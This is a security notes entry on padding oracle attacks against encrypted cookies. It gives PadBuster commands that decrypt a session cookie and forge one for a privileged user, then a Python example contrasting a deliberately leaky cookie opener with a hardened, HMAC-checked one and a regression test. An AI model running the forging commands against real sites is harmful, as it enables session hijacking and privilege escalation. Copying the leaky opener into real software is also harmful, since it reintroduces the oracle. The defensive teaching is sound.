# Padding Oracle

## PadBuster

### Usage on Cookies

  • Oracle on the cookie value: the website's error message for invalid padding is passed as the `-error` string, and PadBuster uses its presence or absence to tell good padding from bad.
  • A high-privileged user account can be targeted by forging its cookie value with `-plaintext`.
```sh
# Decrypt the cookie value; the trailing 8 is the cipher block size in bytes
./padBuster.pl http://10.10.135.100/index.php 3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3 8 -cookies "hcon=3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3" -error "<website error>"

# Same oracle, but encrypt a chosen plaintext to produce a forged cookie value
./padBuster.pl http://$TARGET_IP/index.php 3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3 8 -cookies "session=3AJot%2F7S5NUiay66TEbzg0FkJkO3JGR3" -error "<website error>" -plaintext '<user>=<username>'
```
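The oracle above exists because the server's cookie handler answers differently when the padding is wrong than when it is right. The following is an added example, not part of the compendium and not PadBuster's code: it implements CBC with PKCS#7 padding over a toy Feistel block cipher (a stand-in for AES so the script needs only the standard library; the 16-byte block is an assumption, whereas the `8` passed to PadBuster above is the block size of the real target), then shows a leaky cookie opener beside a hardened one that verifies an HMAC over `iv || ciphertext` in constant time before the padding is ever inspected and maps every failure to one generic error. `oracle_check` is the defender's regression test: it flips one bit that only garbles plaintext and one bit that corrupts the final padding byte, and reports whether the two tampered cookies are distinguishable. All keys, cookie names and values are constructed for the example.

```python
import base64
import hashlib
import hmac
import os

BLOCK = 16  # assumed block size of the toy cipher


class PaddingError(ValueError):
    """Leaky path: a distinguishable failure that becomes the oracle."""


class AuthError(ValueError):
    """Hardened path: the single failure every bad cookie produces."""


def pkcs7_pad(data):
    n = BLOCK - (len(data) % BLOCK)
    return data + bytes([n]) * n


def pkcs7_unpad(data):
    if not data or len(data) % BLOCK:
        raise PaddingError("bad length")
    n = data[-1]
    if n < 1 or n > BLOCK or data[-n:] != bytes([n]) * n:
        raise PaddingError("invalid padding")
    return data[:-n]


# Toy 16-byte block cipher: 4-round Feistel network with HMAC-SHA256 as the
# round function. It only stands in for AES; the CBC/padding logic is the point.
def _round(key, i, half):
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]


def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def block_encrypt(key, block):
    left, right = block[:8], block[8:]
    for i in range(4):
        left, right = right, _xor(left, _round(key, i, right))
    return left + right


def block_decrypt(key, block):
    left, right = block[:8], block[8:]
    for i in reversed(range(4)):
        left, right = _xor(right, _round(key, i, left)), left
    return left + right


def cbc_encrypt(key, iv, plaintext):
    out, prev = b"", iv
    padded = pkcs7_pad(plaintext)
    for i in range(0, len(padded), BLOCK):
        prev = block_encrypt(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return out


def cbc_decrypt(key, iv, ciphertext):
    out, prev = b"", iv
    for i in range(0, len(ciphertext), BLOCK):
        block = ciphertext[i:i + BLOCK]
        out += _xor(block_decrypt(key, block), prev)
        prev = block
    return pkcs7_unpad(out)


def seal_cookie(enc_key, mac_key, value):
    """Cookie = base64(iv || CBC(value) || HMAC-SHA256(iv || ciphertext))."""
    iv = os.urandom(BLOCK)
    body = iv + cbc_encrypt(enc_key, iv, value)
    tag = hmac.new(mac_key, body, hashlib.sha256).digest()
    return base64.urlsafe_b64encode(body + tag).decode()


def open_cookie_leaky(enc_key, cookie):
    # VULNERABLE: ignores the tag and lets PaddingError escape, so the web
    # layer renders a distinct error page for bad padding. That page is the oracle.
    raw = base64.urlsafe_b64decode(cookie)
    return cbc_decrypt(enc_key, raw[:BLOCK], raw[BLOCK:-32])


def open_cookie_safe(enc_key, mac_key, cookie):
    # HARDENED: constant-time MAC check over iv||ciphertext before the padding
    # is inspected, and every failure collapses into one generic error.
    try:
        raw = base64.urlsafe_b64decode(cookie)
        body, tag = raw[:-32], raw[-32:]
        expected = hmac.new(mac_key, body, hashlib.sha256).digest()
        if len(body) < 2 * BLOCK or not hmac.compare_digest(tag, expected):
            raise AuthError
        return cbc_decrypt(enc_key, body[:BLOCK], body[BLOCK:])
    except Exception:
        raise AuthError("invalid session") from None


def oracle_check(enc_key, mac_key, cookie):
    """Flip one bit that only garbles plaintext (padding stays valid) and one
    bit in the block before the last, which corrupts the final padding byte.
    Different responses for the two tampered cookies mean a padding oracle."""
    raw = base64.urlsafe_b64decode(cookie)
    body_len = len(raw) - 32
    results = {}
    for case, pos in (("garble", 0), ("break_padding", body_len - BLOCK - 1)):
        tampered = bytearray(raw)
        tampered[pos] ^= 0x01
        cookie_t = base64.urlsafe_b64encode(bytes(tampered)).decode()
        for impl, opener in (("leaky", lambda c: open_cookie_leaky(enc_key, c)),
                             ("safe", lambda c: open_cookie_safe(enc_key, mac_key, c))):
            try:
                opener(cookie_t)
                results[impl, case] = "accepted"
            except Exception as exc:
                results[impl, case] = type(exc).__name__
    return results
```

Running `oracle_check` on a cookie sealed with `seal_cookie` gives `accepted` versus `PaddingError` for the leaky opener and `AuthError` for both cases with the safe one; the first pair is exactly the signal the `-error` string above keys on. Authenticating before decrypting (or using an AEAD mode) removes it regardless of how error pages are rendered.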